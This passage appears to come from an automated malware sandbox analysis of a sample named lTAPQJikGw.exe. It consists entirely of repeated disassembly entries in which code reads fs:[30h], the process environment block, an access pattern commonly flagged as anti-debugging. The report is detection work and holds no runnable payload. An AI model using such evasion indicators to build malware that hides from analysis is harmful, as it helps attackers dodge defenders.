          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150513A mov eax, dword ptr fs:[00000030h]2_2_0150513A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F4120 mov eax, dword ptr fs:[00000030h]2_2_014F4120
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F4120 mov eax, dword ptr fs:[00000030h]2_2_014F4120
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F4120 mov eax, dword ptr fs:[00000030h]2_2_014F4120
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F4120 mov eax, dword ptr fs:[00000030h]2_2_014F4120
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F4120 mov ecx, dword ptr fs:[00000030h]2_2_014F4120
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DB1E1 mov eax, dword ptr fs:[00000030h]2_2_014DB1E1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DB1E1 mov eax, dword ptr fs:[00000030h]2_2_014DB1E1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DB1E1 mov eax, dword ptr fs:[00000030h]2_2_014DB1E1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015641E8 mov eax, dword ptr fs:[00000030h]2_2_015641E8
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502990 mov eax, dword ptr fs:[00000030h]2_2_01502990
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FC182 mov eax, dword ptr fs:[00000030h]2_2_014FC182
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150A185 mov eax, dword ptr fs:[00000030h]2_2_0150A185
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015551BE mov eax, dword ptr fs:[00000030h]2_2_015551BE
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015551BE mov eax, dword ptr fs:[00000030h]2_2_015551BE
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015551BE mov eax, dword ptr fs:[00000030h]2_2_015551BE
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015551BE mov eax, dword ptr fs:[00000030h]2_2_015551BE
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015061A0 mov eax, dword ptr fs:[00000030h]2_2_015061A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015061A0 mov eax, dword ptr fs:[00000030h]2_2_015061A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015569A6 mov eax, dword ptr fs:[00000030h]2_2_015569A6
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015949A4 mov eax, dword ptr fs:[00000030h]2_2_015949A4
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015949A4 mov eax, dword ptr fs:[00000030h]2_2_015949A4
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015949A4 mov eax, dword ptr fs:[00000030h]2_2_015949A4
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015949A4 mov eax, dword ptr fs:[00000030h]2_2_015949A4
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F0050 mov eax, dword ptr fs:[00000030h]2_2_014F0050
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F0050 mov eax, dword ptr fs:[00000030h]2_2_014F0050
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01592073 mov eax, dword ptr fs:[00000030h]2_2_01592073
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A1074 mov eax, dword ptr fs:[00000030h]2_2_015A1074
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01557016 mov eax, dword ptr fs:[00000030h]2_2_01557016
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01557016 mov eax, dword ptr fs:[00000030h]2_2_01557016
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01557016 mov eax, dword ptr fs:[00000030h]2_2_01557016
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A4015 mov eax, dword ptr fs:[00000030h]2_2_015A4015
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A4015 mov eax, dword ptr fs:[00000030h]2_2_015A4015
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EB02A mov eax, dword ptr fs:[00000030h]2_2_014EB02A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EB02A mov eax, dword ptr fs:[00000030h]2_2_014EB02A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EB02A mov eax, dword ptr fs:[00000030h]2_2_014EB02A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EB02A mov eax, dword ptr fs:[00000030h]2_2_014EB02A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150002D mov eax, dword ptr fs:[00000030h]2_2_0150002D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150002D mov eax, dword ptr fs:[00000030h]2_2_0150002D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150002D mov eax, dword ptr fs:[00000030h]2_2_0150002D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150002D mov eax, dword ptr fs:[00000030h]2_2_0150002D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150002D mov eax, dword ptr fs:[00000030h]2_2_0150002D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156B8D0 mov eax, dword ptr fs:[00000030h]2_2_0156B8D0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156B8D0 mov ecx, dword ptr fs:[00000030h]2_2_0156B8D0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156B8D0 mov eax, dword ptr fs:[00000030h]2_2_0156B8D0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156B8D0 mov eax, dword ptr fs:[00000030h]2_2_0156B8D0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156B8D0 mov eax, dword ptr fs:[00000030h]2_2_0156B8D0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156B8D0 mov eax, dword ptr fs:[00000030h]2_2_0156B8D0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D58EC mov eax, dword ptr fs:[00000030h]2_2_014D58EC
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D40E1 mov eax, dword ptr fs:[00000030h]2_2_014D40E1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D40E1 mov eax, dword ptr fs:[00000030h]2_2_014D40E1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D40E1 mov eax, dword ptr fs:[00000030h]2_2_014D40E1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9080 mov eax, dword ptr fs:[00000030h]2_2_014D9080
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01553884 mov eax, dword ptr fs:[00000030h]2_2_01553884
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01553884 mov eax, dword ptr fs:[00000030h]2_2_01553884
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150F0BF mov ecx, dword ptr fs:[00000030h]2_2_0150F0BF
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150F0BF mov eax, dword ptr fs:[00000030h]2_2_0150F0BF
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150F0BF mov eax, dword ptr fs:[00000030h]2_2_0150F0BF
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015020A0 mov eax, dword ptr fs:[00000030h]2_2_015020A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015020A0 mov eax, dword ptr fs:[00000030h]2_2_015020A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015020A0 mov eax, dword ptr fs:[00000030h]2_2_015020A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015020A0 mov eax, dword ptr fs:[00000030h]2_2_015020A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015020A0 mov eax, dword ptr fs:[00000030h]2_2_015020A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015020A0 mov eax, dword ptr fs:[00000030h]2_2_015020A0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015190AF mov eax, dword ptr fs:[00000030h]2_2_015190AF
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A8B58 mov eax, dword ptr fs:[00000030h]2_2_015A8B58
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DDB40 mov eax, dword ptr fs:[00000030h]2_2_014DDB40
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DF358 mov eax, dword ptr fs:[00000030h]2_2_014DF358
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01503B7A mov eax, dword ptr fs:[00000030h]2_2_01503B7A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01503B7A mov eax, dword ptr fs:[00000030h]2_2_01503B7A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DDB60 mov ecx, dword ptr fs:[00000030h]2_2_014DDB60
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159131B mov eax, dword ptr fs:[00000030h]2_2_0159131B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015553CA mov eax, dword ptr fs:[00000030h]2_2_015553CA
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015553CA mov eax, dword ptr fs:[00000030h]2_2_015553CA
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FDBE9 mov eax, dword ptr fs:[00000030h]2_2_014FDBE9
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015003E2 mov eax, dword ptr fs:[00000030h]2_2_015003E2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015003E2 mov eax, dword ptr fs:[00000030h]2_2_015003E2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015003E2 mov eax, dword ptr fs:[00000030h]2_2_015003E2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015003E2 mov eax, dword ptr fs:[00000030h]2_2_015003E2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015003E2 mov eax, dword ptr fs:[00000030h]2_2_015003E2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015003E2 mov eax, dword ptr fs:[00000030h]2_2_015003E2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150B390 mov eax, dword ptr fs:[00000030h]2_2_0150B390
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E1B8F mov eax, dword ptr fs:[00000030h]2_2_014E1B8F
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E1B8F mov eax, dword ptr fs:[00000030h]2_2_014E1B8F
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502397 mov eax, dword ptr fs:[00000030h]2_2_01502397
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159138A mov eax, dword ptr fs:[00000030h]2_2_0159138A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0158D380 mov ecx, dword ptr fs:[00000030h]2_2_0158D380
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01504BAD mov eax, dword ptr fs:[00000030h]2_2_01504BAD
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01504BAD mov eax, dword ptr fs:[00000030h]2_2_01504BAD
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01504BAD mov eax, dword ptr fs:[00000030h]2_2_01504BAD
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A5BA5 mov eax, dword ptr fs:[00000030h]2_2_015A5BA5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01564257 mov eax, dword ptr fs:[00000030h]2_2_01564257
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159EA55 mov eax, dword ptr fs:[00000030h]2_2_0159EA55
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9240 mov eax, dword ptr fs:[00000030h]2_2_014D9240
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9240 mov eax, dword ptr fs:[00000030h]2_2_014D9240
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9240 mov eax, dword ptr fs:[00000030h]2_2_014D9240
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9240 mov eax, dword ptr fs:[00000030h]2_2_014D9240
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151927A mov eax, dword ptr fs:[00000030h]2_2_0151927A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0158B260 mov eax, dword ptr fs:[00000030h]2_2_0158B260
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0158B260 mov eax, dword ptr fs:[00000030h]2_2_0158B260
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A8A62 mov eax, dword ptr fs:[00000030h]2_2_015A8A62
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E8A0A mov eax, dword ptr fs:[00000030h]2_2_014E8A0A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159AA16 mov eax, dword ptr fs:[00000030h]2_2_0159AA16
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159AA16 mov eax, dword ptr fs:[00000030h]2_2_0159AA16
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F3A1C mov eax, dword ptr fs:[00000030h]2_2_014F3A1C
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DAA16 mov eax, dword ptr fs:[00000030h]2_2_014DAA16
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DAA16 mov eax, dword ptr fs:[00000030h]2_2_014DAA16
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D5210 mov eax, dword ptr fs:[00000030h]2_2_014D5210
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D5210 mov ecx, dword ptr fs:[00000030h]2_2_014D5210
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D5210 mov eax, dword ptr fs:[00000030h]2_2_014D5210
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D5210 mov eax, dword ptr fs:[00000030h]2_2_014D5210
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]2_2_014FA229
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01514A2C mov eax, dword ptr fs:[00000030h]2_2_01514A2C
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01514A2C mov eax, dword ptr fs:[00000030h]2_2_01514A2C
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502ACB mov eax, dword ptr fs:[00000030h]2_2_01502ACB
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502AE4 mov eax, dword ptr fs:[00000030h]2_2_01502AE4
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150D294 mov eax, dword ptr fs:[00000030h]2_2_0150D294
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150D294 mov eax, dword ptr fs:[00000030h]2_2_0150D294
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150FAB0 mov eax, dword ptr fs:[00000030h]2_2_0150FAB0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D52A5 mov eax, dword ptr fs:[00000030h]2_2_014D52A5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D52A5 mov eax, dword ptr fs:[00000030h]2_2_014D52A5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D52A5 mov eax, dword ptr fs:[00000030h]2_2_014D52A5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D52A5 mov eax, dword ptr fs:[00000030h]2_2_014D52A5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D52A5 mov eax, dword ptr fs:[00000030h]2_2_014D52A5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EAAB0 mov eax, dword ptr fs:[00000030h]2_2_014EAAB0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EAAB0 mov eax, dword ptr fs:[00000030h]2_2_014EAAB0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01513D43 mov eax, dword ptr fs:[00000030h]2_2_01513D43
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01553540 mov eax, dword ptr fs:[00000030h]2_2_01553540
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01583D40 mov eax, dword ptr fs:[00000030h]2_2_01583D40
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F7D50 mov eax, dword ptr fs:[00000030h]2_2_014F7D50
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FC577 mov eax, dword ptr fs:[00000030h]2_2_014FC577
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FC577 mov eax, dword ptr fs:[00000030h]2_2_014FC577
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159E539 mov eax, dword ptr fs:[00000030h]2_2_0159E539
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0155A537 mov eax, dword ptr fs:[00000030h]2_2_0155A537
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01504D3B mov eax, dword ptr fs:[00000030h]2_2_01504D3B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01504D3B mov eax, dword ptr fs:[00000030h]2_2_01504D3B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01504D3B mov eax, dword ptr fs:[00000030h]2_2_01504D3B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A8D34 mov eax, dword ptr fs:[00000030h]2_2_015A8D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]2_2_014E3D34
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DAD30 mov eax, dword ptr fs:[00000030h]2_2_014DAD30
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov eax, dword ptr fs:[00000030h]2_2_01556DC9
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov eax, dword ptr fs:[00000030h]2_2_01556DC9
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov eax, dword ptr fs:[00000030h]2_2_01556DC9
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov ecx, dword ptr fs:[00000030h]2_2_01556DC9
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov eax, dword ptr fs:[00000030h]2_2_01556DC9
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov eax, dword ptr fs:[00000030h]2_2_01556DC9
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01588DF1 mov eax, dword ptr fs:[00000030h]2_2_01588DF1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014ED5E0 mov eax, dword ptr fs:[00000030h]2_2_014ED5E0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014ED5E0 mov eax, dword ptr fs:[00000030h]2_2_014ED5E0
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159FDE2 mov eax, dword ptr fs:[00000030h]2_2_0159FDE2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159FDE2 mov eax, dword ptr fs:[00000030h]2_2_0159FDE2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159FDE2 mov eax, dword ptr fs:[00000030h]2_2_0159FDE2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159FDE2 mov eax, dword ptr fs:[00000030h]2_2_0159FDE2
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D2D8A mov eax, dword ptr fs:[00000030h]2_2_014D2D8A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D2D8A mov eax, dword ptr fs:[00000030h]2_2_014D2D8A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D2D8A mov eax, dword ptr fs:[00000030h]2_2_014D2D8A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D2D8A mov eax, dword ptr fs:[00000030h]2_2_014D2D8A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D2D8A mov eax, dword ptr fs:[00000030h]2_2_014D2D8A
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150FD9B mov eax, dword ptr fs:[00000030h]2_2_0150FD9B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150FD9B mov eax, dword ptr fs:[00000030h]2_2_0150FD9B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502581 mov eax, dword ptr fs:[00000030h]2_2_01502581
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502581 mov eax, dword ptr fs:[00000030h]2_2_01502581
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502581 mov eax, dword ptr fs:[00000030h]2_2_01502581
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502581 mov eax, dword ptr fs:[00000030h]2_2_01502581
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01501DB5 mov eax, dword ptr fs:[00000030h]2_2_01501DB5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01501DB5 mov eax, dword ptr fs:[00000030h]2_2_01501DB5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01501DB5 mov eax, dword ptr fs:[00000030h]2_2_01501DB5
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015035A1 mov eax, dword ptr fs:[00000030h]2_2_015035A1
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A05AC mov eax, dword ptr fs:[00000030h]2_2_015A05AC
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A05AC mov eax, dword ptr fs:[00000030h]2_2_015A05AC
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156C450 mov eax, dword ptr fs:[00000030h]2_2_0156C450
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156C450 mov eax, dword ptr fs:[00000030h]2_2_0156C450
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150A44B mov eax, dword ptr fs:[00000030h]2_2_0150A44B
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F746D mov eax, dword ptr fs:[00000030h]2_2_014F746D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A740D mov eax, dword ptr fs:[00000030h]2_2_015A740D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A740D mov eax, dword ptr fs:[00000030h]2_2_015A740D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A740D mov eax, dword ptr fs:[00000030h]2_2_015A740D
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]2_2_01591C06
